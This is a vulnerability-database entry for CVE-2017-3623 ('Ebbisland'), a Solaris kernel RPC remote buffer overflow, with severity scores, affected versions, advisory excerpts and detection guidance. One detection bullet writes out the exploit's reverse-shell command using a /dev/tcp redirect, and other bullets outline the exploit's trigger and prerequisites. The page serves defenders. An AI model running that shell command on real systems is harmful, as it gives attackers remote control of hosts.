CVE-2017-3623
published 2017-04-24CVE-2017-3623: Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note…
PriorityP185critical10CVSS 3.0
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
21.80%
97.3th percentile
Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Solaris. While the vulnerability is in Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Solaris. Note: CVE-2017-3623 is assigned for "Ebbisland". Solaris 10 systems which have had any Kernel patch installed after, or updated via patching tools since 2012-01-26 are not impacted. Also, any Solaris 10 system installed with Solaris 10 1/13 (Solaris 10 Update 11) are not vulnerable. Solaris 11 is not impacted by this issue. CVSS 3.0 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle_corporation | solaris_operating_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect RPC CALL packets using AUTH_LOOPBACK credential flavor (0x55de) arriving from external/non-loopback sources — this is the exploit's credential type used to trigger the kernel RPC buffer overflow. ↗
- →Alert on RPC NULL procedure calls (proc=0) to RPC program 100024 (status service) over TCP that are immediately followed by a second connection with an oversized AUTH_LOOPBACK credential — the exploit first 'pings' then attacks. ↗
- →Look for reverse shell activity spawning bash with '-c' argument containing a /dev/tcp redirect, as the shellcode executes: bash -i >& /dev/tcp/<lhost>/<lport> 0>&1 ↗
- →Solaris 10 systems that have NOT had any Kernel patch installed after 2012-01-26 and are NOT running Solaris 10 1/13 (Update 11) are vulnerable; Solaris 11 is not affected. Scope asset inventory accordingly. ↗
- →If an RPC service crashes repeatedly after receiving oversized AUTH_LOOPBACK credential packets, it may be automatically disabled by inetd — monitor for unexpected RPC service restarts or disablement as a post-exploitation indicator. ↗
- ·The exploit targets IBM AIX PPC in addition to Solaris; the CVE was originally assigned for Solaris but the exploit code demonstrates applicability to AIX versions 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, and 7200-01-01-1642. ↗
- ·The exploit requires the attacker to supply correct gid_base, execl_func, and execl_toc values specific to the target system, meaning exploitation is target-architecture-dependent and not fully generic without reconnaissance. ↗
- ·The exploit shellcode requires /usr/bin/bash to be present on the target system. ↗
CVSS provenance
nvdv3.010.0CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-79mg-vr9v-4r75: Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC)
ghsa_unreviewed·2022-05-13·CVSS 10.0
CVE-2017-3623 [CRITICAL] GHSA-79mg-vr9v-4r75: Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC)
Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Solaris. While the vulnerability is in Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Solaris. Note: CVE-2017-3623 is assigned for "Ebbisland". Solaris 10 systems which have had any Kernel patch installed after, or updated via patching tools since 2012-01-26 are not impacted. Also, any Solaris 10 system installed with Solaris 10 1/13 (Solaris 10 Update 11) are not vulnerable. Solaris 11 is not impacted by this issue. CVSS 3.0 Base Sco
VulnCheck
Oracle Sun Systems Products Suite Solaris Kernel RPC Vulnerability
vulncheck·2017·CVSS 10.0
CVE-2017-3623 [CRITICAL] Oracle Sun Systems Products Suite Solaris Kernel RPC Vulnerability
Oracle Sun Systems Products Suite Solaris Kernel RPC Vulnerability
Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Solaris. While the vulnerability is in Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Solaris. Note: CVE-2017-3623 is assigned for "Ebbisland". Solaris 10 systems which have had any Kernel patch installed after, or updated via patching tools since 2012-01-26 are not impacted. Also, any Solaris 10 system installed with Solaris 10 1/13 (Solaris 10 Update 11) are not vul
No detection rules found.
Checkpoint
BROKERS IN THE SHADOWS: Analyzing vulnerabilities and attacks spawned by the leaked NSA hacking tools
blogs_checkpoint·2017-05-25
CVE-2017-0144 BROKERS IN THE SHADOWS: Analyzing vulnerabilities and attacks spawned by the leaked NSA hacking tools
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## BROKERS IN THE SHADOWS: Analyzing vulnerabilities and attacks spawned by the leaked NSA hacking tools
Background
Rarely does the release of an exploit have such a large impact across the
Qualys
Oracle Plugs Struts and Shadow Brokers hole along with 299 Total Vulnerabilities
blogs_qualys·2017-04-18·CVSS 7.8
[HIGH] Oracle Plugs Struts and Shadow Brokers hole along with 299 Total Vulnerabilities
Today Oracle released a total of 299 new security fixes across all product families. It is important to note that it fixed 25 instances of the infamous Apache Struts vulnerability which could allow a remote attacker to take complete control of the server running Struts. The struts fix was applied to 19 instances of Oracle Financial Services Applications along with WebCenter, WebLogic, Siebel, Oracle Communications, MySQL and Oracle Retail.
Oracle also released Patch 25878798 for Solaris 10 and 11.3 which fixed the second Shadow Brokers EXTREMEPARR vulnerability CVE-2017-3622. EXTREMEPARR has a CVSS Base Score of 7.8, and if successfully exploited allows a local privilege escalation in the ‘dtappgather’ component. The other Shadow Brokers vulnerability CVE-2017-3623 (a.k.a. “Ebbisland” or
Qualys
Oracle Plugs Struts and Shadow Brokers hole along with 299 Total Vulnerabilities | Qualys
blogs_qualys·2017-04-18·CVSS 7.8
[HIGH] Oracle Plugs Struts and Shadow Brokers hole along with 299 Total Vulnerabilities | Qualys
Today Oracle released a total of 299 new security fixes across all product families. It is important to note that it fixed 25 instances of the infamous Apache Struts vulnerability which could allow a remote attacker to take complete control of the server running Struts. The struts fix was applied to 19 instances of Oracle Financial Services Applications along with WebCenter, WebLogic, Siebel, Oracle Communications, MySQL and Oracle Retail.
Oracle also released Patch 25878798 for Solaris 10 and 11.3 which fixed the second Shadow Brokers EXTREMEPARR vulnerability CVE-2017-3622. EXTREMEPARR has a CVSS Base Score of 7.8, and if successfully exploited allows a local privilege escalation in the ‘dtappgather’ component. The other Shadow Brokers vulnerability CVE-2017-3623 (a.k.a. “Ebbisland” or
http://packetstormsecurity.com/files/155876/EBBISLAND-EBBSHAVE-6100-09-04-1441-Remote-Buffer-Overflow.htmlhttp://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.htmlhttp://www.securityfocus.com/bid/97778http://www.securitytracker.com/id/1038292http://packetstormsecurity.com/files/155876/EBBISLAND-EBBSHAVE-6100-09-04-1441-Remote-Buffer-Overflow.htmlhttp://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.htmlhttp://www.securityfocus.com/bid/97778http://www.securitytracker.com/id/1038292
2017-04-24
Published
Exploited in the wild